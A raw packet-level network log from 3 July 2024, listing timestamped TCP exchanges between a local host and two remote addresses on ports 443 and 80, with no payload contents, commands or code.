Jul 3, 2024 16:16:58.573219061 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.573236942 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.576288939 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.576308012 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.576384068 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.576401949 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.576503992 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.576659918 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.576673985 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.576752901 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.576752901 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.576762915 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.577344894 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.577363968 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.577404022 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.577421904 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.577568054 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.618844032 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.632246971 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.632268906 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.632353067 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.632353067 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.632368088 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.632406950 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.633029938 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.633047104 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.633137941 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.633153915 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.633238077 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.651876926 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.651901960 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.651937008 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.651962042 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.651969910 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.652123928 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.663784981 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.663806915 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.663877964 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.663896084 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.663933992 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.664467096 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.664495945 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.664554119 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.664561987 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.664607048 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.664607048 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.667310953 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667327881 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667418003 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.667424917 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667450905 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667474031 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.667484045 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667503119 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667519093 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667535067 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.667556047 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.667562962 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.667589903 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.667653084 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.667659998 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.712506056 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.721522093 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.721637011 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.721659899 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.721735001 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.722150087 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.722171068 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.722235918 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.722254038 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.741555929 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.741581917 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.741626978 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.741658926 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.741707087 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.753436089 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.753453970 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.753518105 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.753530025 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.753933907 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.753953934 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.754002094 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.754009962 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.754055023 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.756686926 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.756701946 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.756764889 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.756805897 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.757169008 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.757189035 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.757234097 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.757241011 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.757291079 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.757742882 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.757755995 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.757813931 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.757822037 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.757855892 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.806184053 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.812123060 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.812134027 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.812175035 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.812244892 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.812254906 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.812271118 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.812306881 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.812683105 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.812701941 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.812768936 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.812777996 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.812820911 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.833534002 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.833556890 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.833688974 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.833718061 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.833767891 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.844280958 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.844299078 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.844366074 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.844373941 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.844417095 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.844417095 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.844824076 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.844841957 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.844923973 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.844940901 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.844985008 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.847708941 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.847727060 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.847786903 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.847794056 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.847842932 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.848339081 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.848411083 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.848427057 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.848445892 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.848490953 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.848949909 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.848967075 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.849011898 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.849026918 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.849041939 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.849070072 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.849070072 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.902920008 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.903534889 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.903625965 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.903639078 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.903650045 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.903683901 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.904119015 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.904134989 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.904233932 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.904233932 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.904254913 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.924194098 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.924212933 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.924309015 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.924330950 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.934881926 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.934902906 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.934998035 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.934998035 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.935019970 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.935461998 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.935477972 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.935535908 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.935549021 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.938469887 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.938484907 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.938559055 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.938580990 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.938600063 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.939106941 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.939121008 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.939193964 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.939208031 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.939619064 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.939635038 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.939721107 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.939740896 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.993644953 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.994030952 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.994045973 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.994083881 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.994124889 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.994136095 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.994169950 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.994508028 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.994524956 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:58.994613886 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:58.994623899 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.015001059 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.015021086 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.015104055 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.015126944 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.015157938 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.025612116 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.025628090 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.025687933 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.025696039 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.025742054 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.026185989 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.026201010 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.026249886 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.026258945 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.026289940 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.029073954 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.029095888 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.029170990 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.029170990 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.029181957 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.029668093 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.029681921 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.029721022 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.029736042 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.029767036 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.030347109 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.030360937 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.030404091 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.030411959 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.030457973 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.071805000 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.084923029 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.084950924 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.085009098 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.085076094 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.085083008 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.085146904 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.085629940 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.085645914 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.085699081 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.085707903 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.085724115 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.085760117 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.105612040 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.105637074 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.105700016 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.105715036 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.105734110 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.105773926 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.116336107 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.116353035 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.116463900 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.116473913 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.116518974 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.116930008 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.116947889 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.117011070 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.117017984 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.117028952 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.117105961 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.119617939 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.119636059 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.119688988 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.119698048 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.119721889 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.119749069 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.120270014 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.120286942 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.120348930 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.120357990 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.120398045 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.120848894 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.120866060 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.120903969 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.120915890 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.120959997 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.120959997 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.175648928 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.175669909 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.175741911 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.175757885 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.175838947 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.176163912 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.176182985 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.176235914 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.176245928 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.176260948 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.176325083 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.196454048 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.196475983 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.196563005 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.196576118 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.196674109 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.207607031 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.207624912 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.207740068 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.207751036 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.207804918 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.208142996 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.208161116 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.208254099 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.208262920 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.208331108 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.210509062 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.210525036 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.210606098 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.210613012 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.210670948 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.211200953 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.211216927 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.211302996 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.211302996 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.211311102 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.211359024 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.211977005 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.212023973 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.212052107 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.212060928 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.212099075 CEST	443	49704	104.21.10.178	192.168.2.10
Jul 3, 2024 16:16:59.212110043 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.212138891 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:16:59.218048096 CEST	49704	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:00.503000975 CEST	49705	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:00.508220911 CEST	80	49705	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:00.508305073 CEST	49705	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:00.508558989 CEST	49705	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:00.514311075 CEST	80	49705	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:01.010091066 CEST	80	49705	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:01.056200027 CEST	49705	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:01.261754990 CEST	80	49705	34.117.118.44	192.168.2.10
Jul 3, 2024 16:17:01.261825085 CEST	49705	80	192.168.2.10	34.117.118.44
Jul 3, 2024 16:17:10.672130108 CEST	49706	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:10.672185898 CEST	443	49706	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:10.672286034 CEST	49706	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:10.677664042 CEST	49706	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:10.677680969 CEST	443	49706	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:11.157638073 CEST	443	49706	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:11.157844067 CEST	49706	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:11.159682035 CEST	49706	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:11.159694910 CEST	443	49706	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:11.159954071 CEST	443	49706	104.21.10.178	192.168.2.10
